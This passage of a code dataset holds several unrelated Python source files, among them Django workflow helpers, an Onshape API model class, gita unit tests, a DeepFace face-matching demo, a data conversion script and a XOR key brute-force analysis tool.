3\"),\n\t\t(\"sfx/Music/Neutral-10d.mp3\", \"Cbt Neutral 4\"),\n\t\t(\"sfx/Music/Neutral-10e.mp3\", \"Cbt Neutral 5\"),\n\t\t(\"sfx/Music/Neutral-10f.mp3\", \"Cbt Neutral 6\"),\n\t\t(\"sfx/Music/Neutral-10g.mp3\", \"Cbt Neutral 7\"),\n\t\t(\"sfx/Music/Neutral-10h.mp3\", \"Cbt Neutral 8\"),\n\t\t(\"sfx/Music/Neutral-10a.mp3\", \"Cbt Neutral 9\"),\n\t\t(\"sfx/Music/Confident-11a.mp3\", \"Cbt Confident 1\"),\n\t\t(\"sfx/Music/Confident-11b.mp3\", \"Cbt Confident 2\"),\n\t\t(\"sfx/Music/Confident-11c.mp3\", \"Cbt Confident 3\"),\n\t\t(\"sfx/Music/Confident-11d.mp3\", \"Cbt Confident 4\"),\n\t\t(\"sfx/Music/Confident-11e.mp3\", \"Cbt Confident 5\"),\n\t\t(\"sfx/Music/Confident-11f.mp3\", \"Cbt Confident 6\"),\n\t\t(\"sfx/Music/Confident-11g.mp3\", \"Cbt Confident 7\")),\n\t\t# Which music to use as a transition between 2\n\t\t# other pieces.\n\t\t(),\n\t\t# Special music states which are collections of\n\t\t# pieces of music, played in random order.\n\t\t((\"Combat Panic\", (\"Cbt Panic 1\",\n\t\t\t\t\"Cbt Panic 2\",\n\t\t\t\t\"Cbt Panic 3\",\n\t\t\t\t\"Cbt Panic 4\",\n\t\t\t\t\"Cbt Panic 5\",\n\t\t\t\t\"Cbt Panic 6\",\n\t\t\t\t\"Cbt Panic 7\")),\n\t\t(\"Combat Neutral\", (\"Cbt Neutral 1\",\n\t\t\t\t\"Cbt Neutral 2\",\n\t\t\t\t\"Cbt Neutral 3\",\n\t\t\t\t\"Cbt Neutral 4\",\n\t\t\t\t\"Cbt Neutral 5\",\n\t\t\t\t\"Cbt Neutral 6\",\n\t\t\t\t\"Cbt Neutral 7\",\n\t\t\t\t\"Cbt Neutral 8\",\n\t\t\t\t\"Cbt Neutral 9\")),\n\t\t(\"Combat Confident\", (\"Cbt Confident 1\",\n\t\t\t\t\"Cbt Confident 2\",\n\t\t\t\t\"Cbt Confident 3\",\n\t\t\t\t\"Cbt Confident 4\",\n\t\t\t\t\"Cbt Confident 5\",\n\t\t\t\t\"Cbt Confident 6\",\n\t\t\t\t\"Cbt Confident 7\"))),\n\t\t# Which state machine to use.\n\t\tDynamicMusic.StandardCombatMusic)\n\n################################################################################\n##\tTerminate()\n##\n##\tCalled to terminate our episode.\n##\n##\tArgs:\tpEpisode\t- The episode level object.\n##\n##\tReturn:\tNone\n################################################################################\ndef Terminate(pEpisode):\n\t\"Called Terminate and de-activate an Episode\"\n\tpass\n","sub_path":"scripts/Maelstrom/Episode2/Episode2.py","file_name":"Episode2.py","file_ext":"py","file_size_in_byte":10679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622258972","text":"from deepface import DeepFace\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg1_path = \"test/a1.jpg\" #yüzünü tanımasını isteyeceğiniz kişi\r\nimg2_path = \"test/a2.jpg\" #yüzünü tanıtığınız 1.kişi\r\nimg3_path = \"test/a3.jpg\" #yüzünü tanıttığınız 2.kişi\r\nimg4_path = \"test/a4.jpg\" #yüzünü tanıttığınız 3.kişi\r\nimg1 = cv2.imread(img1_path)\r\nimg2 = cv2.imread(img2_path)\r\nimg3 = cv2.imread(img3_path)\r\nimg4 = cv2.imread(img4_path)\r\nplt.imshow(img1[:,:,::-1])\r\nplt.show()\r\n\r\nplt.imshow(img2[:,:,::-1])\r\nplt.show()\r\n\r\nplt.imshow(img3[:,:,::-1])\r\nplt.show()\r\n\r\nplt.imshow(img3[:,:,::-1])\r\nplt.show()\r\nresp = DeepFace.verify(img1,img2)\r\nresp1 = DeepFace.verify(img1,img3)\r\n\r\nprint(resp[\"verified\"])\r\nif resp[\"verified\"] == 1:\r\n print(\"Fotoğraftaki kişi Kemal Sunal\")\r\nelif resp1[\"verified\"] == 1:\r\n print(\"Fotoğraftaki kişi elon musk\")\r\nelse :\r\n print(\"Sonuç bulunamadı\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325229587","text":"isTest = False\ntest = \"\"\nif isTest : test = \"Test\"\n\nimport os, sys\nroot = os.getenv(\"B2KTAUMUROOT\")\nif root is not None : \n sys.path.append(root+\"/Options\" )\nsys.path.append(os.getcwd())\n\nimport B2KTauMuOption as opt\nfrom DV_Config import ConfigDaVinci\n\nopt.setalgs()\nConfigDaVinci(\"CL\",16,opt.algs,Mag=test,RootInTES=\"Bhadron\",isTest=isTest)\n\n\n","sub_path":"Options/MyOption_DataBhadron.py","file_name":"MyOption_DataBhadron.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"286608874","text":"import pytest\nimport os\nfrom unittest.mock import patch, mock_open\n\nfrom gita import utils\n\nTEST_DIR = os.path.abspath(os.path.dirname(__file__))\nPATH_FNAME = os.path.join(TEST_DIR, 'mock_path_file')\nPATH_FNAME_EMPTY = os.path.join(TEST_DIR, 'empty_path_file')\nPATH_FNAME_CLASH = os.path.join(TEST_DIR, 'clash_path_file')\n\n\n@pytest.mark.parametrize('test_input, has_remote, expected', [\n ({\n 'abc': '/root/repo/'\n }, True, 'abc \\x1b[31mrepo *+_ \\x1b[0m msg'),\n ({\n 'repo': '/root/repo2/'\n }, False, 'repo \\x1b[37mrepo *+_ \\x1b[0m msg'),\n])\ndef test_describe(test_input, has_remote, expected, monkeypatch):\n monkeypatch.setattr(utils, 'get_head', lambda x: 'repo')\n monkeypatch.setattr(utils, 'has_remote', lambda: has_remote)\n monkeypatch.setattr(utils, 'get_commit_msg', lambda: \"msg\")\n monkeypatch.setattr(utils, 'has_untracked', lambda: True)\n monkeypatch.setattr('os.chdir', lambda x: None)\n # Returns of os.system determine the repo status\n monkeypatch.setattr('os.system', lambda x: True)\n print('expected: ', repr(expected))\n print('got: ', repr(next(utils.describe(test_input))))\n assert expected == next(utils.describe(test_input))\n\n\ndef test_get_head():\n with patch('builtins.open',\n mock_open(read_data='ref: refs/heads/snake')) as mock_file:\n head = utils.get_head('/fake')\n assert head == 'snake'\n mock_file.assert_called_once_with('/fake/.git/HEAD')\n\n\n@pytest.mark.parametrize('path_fname, expected', [\n (PATH_FNAME, {\n 'repo1': '/a/bcd/repo1',\n 'repo2': '/e/fgh/repo2'\n }),\n (PATH_FNAME_EMPTY, {}),\n (PATH_FNAME_CLASH, {\n 'repo1': '/a/bcd/repo1',\n 'repo2': '/e/fgh/repo2',\n 'x/repo1': '/root/x/repo1'\n }),\n])\n@patch('gita.utils.is_git', return_value=True)\n@patch('gita.utils.get_path_fname')\ndef test_get_repos(mock_path_fname, _, path_fname, expected):\n mock_path_fname.return_value = path_fname\n utils.get_repos.cache_clear()\n repos = utils.get_repos()\n assert repos == expected\n\n\n@pytest.mark.parametrize(\n 'path_input, expected',\n [\n (['/home/some/repo/'], '/home/some/repo:/nos/repo'), # add one new\n (['/home/some/repo1', '/repo2'],\n '/home/some/repo1:/nos/repo:/repo2'), # add two new\n (['/home/some/repo1', '/nos/repo'],\n '/home/some/repo1:/nos/repo'), # add one old one new\n ])\n@patch('os.path.expanduser', return_value='/root')\n@patch('os.makedirs')\n@patch('gita.utils.get_repos', return_value={'repo': '/nos/repo'})\n@patch('gita.utils.is_git', return_value=True)\ndef test_add_repos(_0, _1, _2, _3, path_input, expected):\n with patch('builtins.open', mock_open()) as mock_file:\n utils.add_repos(path_input)\n mock_file.assert_called_with('/root/.gita/repo_path', 'w')\n handle = mock_file()\n handle.write.assert_called_once_with(expected)\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"546810129","text":"from __future__ import unicode_literals\nfrom applications.workflow import Flow\nfrom .models import Location, Record, PublicationNewspaper, PublicationWebsite, PublicationFeedback,Referral,Application\nfrom django.utils.safestring import SafeText\nfrom django.contrib.auth.models import Group\nfrom applications.validationchecks import Attachment_Extension_Check\n\nclass Application_Part5():\n\n def get(self,app,self_view,context):\n request = self_view.request\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n workflowtype = flow.getWorkFlowTypeFromApp(app)\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow'] = flow.getAllRouteConf(workflowtype,app.routeid)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n try:\n LocObj = Location.objects.get(application_id=self_view.object.id)\n context['certificate_of_title_volume'] = LocObj.title_volume\n context['folio'] = LocObj.folio\n context['diagram_plan_deposit_number'] = LocObj.dpd_number\n context['location'] = LocObj.location\n context['reserve_number'] = LocObj.reserve\n context['street_number_and_name'] = LocObj.street_number_name\n context['town_suburb'] = LocObj.suburb\n context['lot'] = LocObj.lot\n context['nearest_road_intersection'] = LocObj.intersection\n except:\n donothing = ''\n\n context['publication_newspaper'] = PublicationNewspaper.objects.filter(application_id=self_view.object)\n context['publication_website'] = PublicationWebsite.objects.filter(application_id=self_view.object)\n if self_view.object.river_lease_scan_of_application:\n context['river_lease_scan_of_application_short'] = SafeText(self_view.object.river_lease_scan_of_application.upload.name)[19:]\n\n if self_view.object.document_draft:\n context['document_draft_short'] = SafeText(self_view.object.document_draft.upload.name)[19:]\n if self_view.object.document_final:\n context['document_final_short'] = SafeText(self_view.object.document_final.upload.name)[19:]\n if self_view.object.deed:\n context['deed_short'] = SafeText(self_view.object.deed.upload.name)[19:]\n\n\n context['land_owner_consent_list'] = []\n landoc = app.land_owner_consent.all()\n for doc in landoc:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n context['land_owner_consent_list'].append(fileitem)\n\n\n context['publication_newspaper_list'] = []\n pub_news_obj = []\n pub_news_mod = PublicationNewspaper.objects.filter(application_id=self_view.object)\n for pubrow in pub_news_mod:\n rowitem = {}\n rowitem['pk'] = pubrow.pk\n rowitem['id'] = pubrow.id\n rowitem['date'] = pubrow.date\n rowitem['newspaper'] = pubrow.newspaper\n rowitem['application'] = pubrow.application\n rowitem['records'] = pubrow.records\n rowitem['documents_short'] = []\n records = pubrow.records.all()\n for doc in records:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n rowitem['documents_short'].append(fileitem)\n context['publication_newspaper_list'].append(rowitem)\n\n\n pub_feed_obj = []\n pub_feed_mod = PublicationFeedback.objects.filter(application_id=self_view.object)\n for pubrow in pub_feed_mod:\n rowitem = {}\n rowitem['id'] = pubrow.id\n rowitem['name'] = pubrow.name\n rowitem['address'] = pubrow.address\n rowitem['suburb'] = pubrow.suburb\n rowitem['state'] = pubrow.state\n rowitem['postcode'] = pubrow.postcode\n rowitem['phone'] = pubrow.phone\n rowitem['email'] = pubrow.email\n rowitem['comments'] = pubrow.comments\n rowitem['records'] = pubrow.records\n rowitem['documents_short'] = [] # needed so we can add documents to list\n rowitem['status'] = pubrow.status\n rowitem['application'] = pubrow.application\n records = pubrow.records.all()\n for doc in records:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n rowitem['documents_short'].append(fileitem)\n pub_feed_obj.append(rowitem)\n\n context['publication_feedback'] = pub_feed_obj\n\n new_documents_to_publish = {}\n pub_web = PublicationWebsite.objects.filter(application_id=self_view.object.id)\n for pub_doc in pub_web:\n if pub_doc.published_document_id:\n doc = Record.objects.get(id=pub_doc.published_document_id)\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n new_documents_to_publish[pub_doc.original_document_id] = fileitem\n\n orignaldoclist = []\n if self_view.object.river_lease_scan_of_application:\n fileitem = {}\n fileitem['fileid'] = self_view.object.river_lease_scan_of_application.id\n fileitem['path'] = self_view.object.river_lease_scan_of_application.upload.name\n fileitem['path_short'] = SafeText(self_view.object.river_lease_scan_of_application.upload.name)[19:]\n fileitem['group_name'] = \"River Lease Scan of Application\"\n if self_view.object.river_lease_scan_of_application.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[self_view.object.river_lease_scan_of_application.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[self_view.object.river_lease_scan_of_application.id]['path'])[19:]\n orignaldoclist.append(fileitem)\n\n if self_view.object.deed:\n fileitem = {}\n fileitem['fileid'] = self_view.object.deed.id\n fileitem['path'] = self_view.object.deed.upload.name\n fileitem['path_short'] = SafeText(self_view.object.deed.upload.name)[19:]\n fileitem['group_name'] = \"Deed\"\n if self_view.object.deed.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[self_view.object.deed.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[self_view.object.deed.id]['path'])[19:]\n orignaldoclist.append(fileitem)\n\n landoc = app.land_owner_consent.all()\n for doc in landoc:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n fileitem['group_name'] = \"Land Owner Consent\"\n if doc.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[doc.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[doc.id]['path'])[19:]\n else:\n fileitem['publish_doc'] = \"\"\n fileitem['publish_doc_short'] = \"\"\n\n orignaldoclist.append(fileitem)\n\n doclist = app.proposed_development_plans.all()\n for doc in doclist:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n fileitem['group_name'] = \"Proposed Development Plans\"\n\n if doc.id in new_documents_to_publish:\n fileitem['publish_doc'] = new_documents_to_publish[doc.id]['path']\n fileitem['publish_doc_short'] = SafeText(new_documents_to_publish[doc.id]['path'])[19:]\n else:\n fileitem['publish_doc'] = \"\"\n fileitem['publish_doc_short'] = \"\"\n orignaldoclist.append(fileitem)\n context['original_document_list'] = orignaldoclist\n\n doclist = app.proposed_development_plans.all()\n context['proposed_development_plans_list'] = []\n for doc in doclist:\n fileitem = {}\n fileitem['fileid'] = doc.id\n fileitem['path'] = doc.upload.name\n fileitem['path_short'] = SafeText(doc.upload.name)[19:]\n context['proposed_development_plans_list'].append(fileitem)\n\n return context\n\n\nclass Application_Emergency():\n\n def get(self,app,self_view,context):\n request = self_view.request\n workflowtype = \"emergency\"\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n if app.organisation:\n context['address'] = app.organisation.postal_address\n elif app.applicant:\n context['address'] = app.applicant.postal_address\n\n return context\n\nclass Application_Permit():\n def get(self,app,self_view,context):\n request = self_view.request\n workflowtype = \"permit\"\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n return context\n\nclass Application_Licence():\n def get(self,app,self_view,context):\n request = self_view.request\n workflowtype = \"licence\"\n\n if app.routeid is None:\n app.routeid = 1\n\n flow = Flow()\n flow.get(workflowtype)\n context = flow.getAccessRights(request,context,app.routeid,workflowtype)\n context = flow.getCollapse(context,app.routeid,workflowtype)\n context = flow.getHiddenAreas(context,app.routeid,workflowtype)\n context['workflow_actions'] = flow.getAllRouteActions(app.routeid,workflowtype)\n context['formcomponent'] = flow.getFormComponent(app.routeid,workflowtype)\n context['workflowoptions'] = flow.getWorkflowOptions()\n\n return context\n\n\nclass Referrals_Next_Action_Check():\n\n def get(self,app):\n app_refs = Referral.objects.filter(application=app)\n# print app_refs\n referralscompleted = True\n for ref in app_refs:\n if ref.status == Referral.REFERRAL_STATUS_CHOICES.referred:\n referralscompleted = False\n\n return referralscompleted\n\n def go_next_action(self,app):\n app = Application.objects.get(id=app.id)\n app.status = ''\n flow = Flow()\n workflowtype = flow.getWorkFlowTypeFromApp(app)\n DefaultGroups = flow.groupList()\n flow.get(workflowtype)\n assignee = None\n routes = flow.getAllRouteActions(app.routeid,workflowtype)\n action = routes[0]['routegroup']\n if action in DefaultGroups['grouplink']:\n groupassignment = Group.objects.get(name=DefaultGroups['grouplink'][action])\n else:\n groupassignment = None\n route = flow.getNextRouteObj(action,app.routeid,workflowtype)\n\n if \"route\"in route:\n app.routeid = route[\"route\"]\n else:\n app.routeid = None\n\n if \"state\" in route:\n app.state = route[\"state\"]\n else:\n app.state = 0 \n\n app.group = groupassignment\n app.assignee = assignee\n app.save()\n\n\n\n\n","sub_path":"applications/views_sub.py","file_name":"views_sub.py","file_ext":"py","file_size_in_byte":12920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"463172152","text":"# coding: utf-8\n\n\"\"\"\n Onshape REST API\n\n The Onshape REST API consumed by all clients. # noqa: E501\n\n The version of the OpenAPI document: 1.113\n Contact: api-support@onshape.zendesk.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import absolute_import\nimport re # noqa: F401\nimport sys # noqa: F401\n\nimport six # noqa: F401\nimport nulltype # noqa: F401\n\nfrom onshape_client.oas.model_utils import ( # noqa: F401\n ModelComposed,\n ModelNormal,\n ModelSimple,\n date,\n datetime,\n file_type,\n int,\n none_type,\n str,\n validate_get_composed_info,\n)\n\ntry:\n from onshape_client.oas.models import btfs_value_array1499\nexcept ImportError:\n btfs_value_array1499 = sys.modules[\"onshape_client.oas.models.btfs_value_array1499\"]\ntry:\n from onshape_client.oas.models import btfs_value_boolean1195\nexcept ImportError:\n btfs_value_boolean1195 = sys.modules[\n \"onshape_client.oas.models.btfs_value_boolean1195\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_map2062\nexcept ImportError:\n btfs_value_map2062 = sys.modules[\"onshape_client.oas.models.btfs_value_map2062\"]\ntry:\n from onshape_client.oas.models import btfs_value_number772\nexcept ImportError:\n btfs_value_number772 = sys.modules[\"onshape_client.oas.models.btfs_value_number772\"]\ntry:\n from onshape_client.oas.models import btfs_value_other1124\nexcept ImportError:\n btfs_value_other1124 = sys.modules[\"onshape_client.oas.models.btfs_value_other1124\"]\ntry:\n from onshape_client.oas.models import btfs_value_string1422\nexcept ImportError:\n btfs_value_string1422 = sys.modules[\n \"onshape_client.oas.models.btfs_value_string1422\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_too_big1247\nexcept ImportError:\n btfs_value_too_big1247 = sys.modules[\n \"onshape_client.oas.models.btfs_value_too_big1247\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_undefined2003\nexcept ImportError:\n btfs_value_undefined2003 = sys.modules[\n \"onshape_client.oas.models.btfs_value_undefined2003\"\n ]\ntry:\n from onshape_client.oas.models import btfs_value_with_units1817\nexcept ImportError:\n btfs_value_with_units1817 = sys.modules[\n \"onshape_client.oas.models.btfs_value_with_units1817\"\n ]\n\n\nclass BTFSValue1888(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n additional_properties_type = None\n\n @staticmethod\n def openapi_types():\n \"\"\"\n This must be a class method so a model may have properties that are\n of type self, this ensures that we don't create a cyclic import\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n return {\n \"bt_type\": (str,), # noqa: E501\n \"configuration_value_string\": (str,), # noqa: E501\n \"standard_type_name\": (str,), # noqa: E501\n \"type_tag\": (str,), # noqa: E501\n \"value_object\": (\n bool,\n date,\n datetime,\n dict,\n float,\n int,\n list,\n str,\n ), # noqa: E501\n }\n\n @staticmethod\n def discriminator():\n return {\n \"bt_type\": {\n \"BTFSValueArray-1499\": btfs_value_array1499.BTFSValueArray1499,\n \"BTFSValueString-1422\": btfs_value_string1422.BTFSValueString1422,\n \"BTFSValueWithUnits-1817\": btfs_value_with_units1817.BTFSValueWithUnits1817,\n \"BTFSValueOther-1124\": btfs_value_other1124.BTFSValueOther1124,\n \"BTFSValueTooBig-1247\": btfs_value_too_big1247.BTFSValueTooBig1247,\n \"BTFSValueNumber-772\": btfs_value_number772.BTFSValueNumber772,\n \"BTFSValueUndefined-2003\": btfs_value_undefined2003.BTFSValueUndefined2003,\n \"BTFSValueBoolean-1195\": btfs_value_boolean1195.BTFSValueBoolean1195,\n },\n }\n\n attribute_map = {\n \"bt_type\": \"btType\", # noqa: E501\n \"configuration_value_string\": \"configurationValueString\", # noqa: E501\n \"standard_type_name\": \"standardTypeName\", # noqa: E501\n \"type_tag\": \"typeTag\", # noqa: E501\n \"value_object\": \"valueObject\", # noqa: E501\n }\n\n @staticmethod\n def _composed_schemas():\n return None\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_from_server\",\n \"_path_to_item\",\n \"_configuration\",\n ]\n )\n\n def __init__(\n self,\n _check_type=True,\n _from_server=False,\n _path_to_item=(),\n _configuration=None,\n **kwargs\n ): # noqa: E501\n \"\"\"btfs_value1888.BTFSValue1888 - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _from_server (bool): True if the data is from the server\n False if the data is from the client (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n bt_type (str): [optional] # noqa: E501\n configuration_value_string (str): [optional] # noqa: E501\n standard_type_name (str): [optional] # noqa: E501\n type_tag (str): [optional] # noqa: E501\n value_object (bool, date, datetime, dict, float, int, list, str): [optional] # noqa: E501\n \"\"\"\n\n self._data_store = {}\n self._check_type = _check_type\n self._from_server = _from_server\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n\n for var_name, var_value in six.iteritems(kwargs):\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n\n @classmethod\n def get_discriminator_class(cls, from_server, data):\n \"\"\"Returns the child class specified by the discriminator\"\"\"\n discriminator = cls.discriminator()\n discr_propertyname_py = list(discriminator.keys())[0]\n discr_propertyname_js = cls.attribute_map[discr_propertyname_py]\n if from_server:\n class_name = data[discr_propertyname_js]\n else:\n class_name = data[discr_propertyname_py]\n class_name_to_discr_class = discriminator[discr_propertyname_py]\n return class_name_to_discr_class.get(class_name)\n","sub_path":"python/onshape_client/oas/models/btfs_value1888.py","file_name":"btfs_value1888.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206213776","text":"import numpy as np\n\n# Read In MSD Data From TXT Files\n# Data From : https://archive.ics.uci.edu/ml/datasets/YearPredictionMSD\nmsd_data = np.genfromtxt('./YearPredictionMSD.txt', delimiter=',')\n\n\n# Subset Into Training and Testing Data\ntrain_data = msd_data[0:463715, :]\ntest_data = msd_data[463715:, :]\n\n# Convert To npz\nnp.savez('./msd_data.npz', train_data=train_data, test_data=test_data)\n","sub_path":"sample_data/msd/convert_csv_to_npz.py","file_name":"convert_csv_to_npz.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"399968136","text":"'''\nxorAscii v20140721 - John Moran (john@jtmoran.com)\n\nxorAscii iterates through each XOR key and outputs the percentage of \nASCII bytes returned, the long ASCII string returned and the number of \nASCII strings returned longer than 5 characters. It will also print \nthe resulting output if specified. This code is currently experimental.\n \nOptions:\n \n -f, --file XOR encrypted file\n -o --offset Offset to begin in bytes (Default: 0)\n -l, --length Length to read in bytes (Default: 100)\n -x, --xorlen XOR key length in bytes (1 or 2, Default: 1)\n -t --threshold Minimum % ASCII characters to print\n -p --print Print Hex and ASCII view of XOR'd data\n -h, --help Show help'''\n\nimport os\nimport getopt\nimport sys\nfrom string import ascii_letters, digits, punctuation\n \n#XOR data \ndef xor(data, key):\n l = len(key)\n return bytearray(((data[i] ^ key[i % l]) for i in range(0,len(data))))\n\n#Print data in hex view\ndef bufferToHex(buffer, start, count):\n accumulator = ''\n for item in range(count):\n accumulator += '%02X' % buffer[start + item] + ' '\n return accumulator\n\n#Print data in ascii view\ndef bufferToAscii(buffer, start, count):\n accumulator = ''\n for item in range(count):\n char = chr(buffer[start + item])\n if char in ascii_letters or char in digits or char in punctuation or char == ' ':\n accumulator += char\n else:\n accumulator += '.'\n return accumulator\n\ndef printXORData(xorData) :\n index = 0\n size = 16\n bytesRead = len(xorData)\n hexFormat = '{:'+str(size*3)+'}'\n asciiFormat = '{:'+str(size)+'}'\n print(\"--------------------------------------------------------------------\")\n while index < bytesRead:\n hex = bufferToHex(xorData, index, size)\n ascii = bufferToAscii(xorData, index, size)\n print(hexFormat.format(hex), end='')\n print('|',asciiFormat.format(ascii),'|')\n index += size\n if bytesRead - index < size:\n size = bytesRead - index\n print(\"--------------------------------------------------------------------\")\n \ndef main (argv):\n\t#Get command line options\n threshold = 60\n length = 100\n offset = 0\n xorlen = 1\n printData = 0\n xorbits = 2 ** (int(xorlen) * 8)\n try:\n\t opts, args = getopt.getopt(argv, \"f:x:o:l:t:ph\", [\"file=\", \"length=\", \"string=\", \"threshold=\", \"print\", \"help\"])\n except getopt.GetoptError:\n print(__doc__)\n sys.exit(2)\n optsDict = dict(opts)\n if not \"-f\" in optsDict:\n print(\"Error: File name required!\")\n print(__doc__)\n raise SystemExit\n for opt, arg in opts: \n\t #Help\n if opt in (\"-h\", \"--help\"):\n print(__doc__)\n raise SystemExit\t\n \t#File\n if opt in (\"-f\", \"--file\"):\n fname = arg\n #Length\n if opt in (\"-l\", \"--length\"):\n try:\n length = int(arg)\n except:\n print(\"Error: Invalid length!\")\n print(__doc__)\n raise SystemExit\n \t#Offset\n if opt in (\"-o\", \"--offset\"):\n try:\n offset = int(arg)\n except:\n print(\"Error: Invalid length!\")\n print(__doc__)\n raise SystemExit\n \t#Threshold\n if opt in (\"-t\", \"--threshold\"):\n try:\n threshold = int(arg)\n except:\n print(\"Error: Invalid threshold!\")\n print(__doc__)\n raise SystemExit\n #Print Data\n if opt in (\"-p\", \"--print\"):\n printData = 1\n #Key Length\n if opt in (\"-x\", \"--xorlen\"):\n try:\n if ( 1 > int(arg) > 2):\n print(\"Error: XOR key length must be between 1 and 2!\")\n print(__doc__)\n raise SystemExit\n xorlen = int(arg)\n xorbits = 2 ** (int(xorlen) * 8)\n except:\n print(\"Error: Invalid XOR key length!\")\n print(__doc__)\n raise SystemExit\n print(\"xorAscii v20140727\")\n try:\n fh = open(fname, \"rb\")\n except:\n print(\"Error: Unable to open '\" + fname + \"'\")\n print(__doc__)\n raise SystemExit\n #Make sure length and offset are valid\n finfo = os.stat(fname)\n if (finfo.st_size < int(length) + int(offset)):\n print(\"Error: Length or offset too large! Read past EOF\")\n raise SystemExit\t\n else:\n fh.seek(offset)\n b = bytearray(fh.read(length))\n hexrange = []\n asciiChrs = []\n #Add 0-9\n for a in range(48,57):\n asciiChrs.append(a)\n #Add A-Z\n for a in range(65,90):\n asciiChrs.append(a)\n #Add a-z\n for a in range(97,122):\n asciiChrs.append(a)\n for i in range(0,xorbits):\n hexrange.append(i)\n print(\"--------------------------------------------------------------------\")\n print(\"|{0:^15}|{1:^15}|{2:^15}|{3:^18}|\".format(\"XOR Key\", \"% ASCII Bytes\", \"Longest ASCII\", \"# ASCII Strings\")) \n print(\"|{0:^15}|{1:^15}|{2:^15}|{3:^18}|\".format(\"\", \"\", \"String\", \"Longer 5 Chr\"))\n 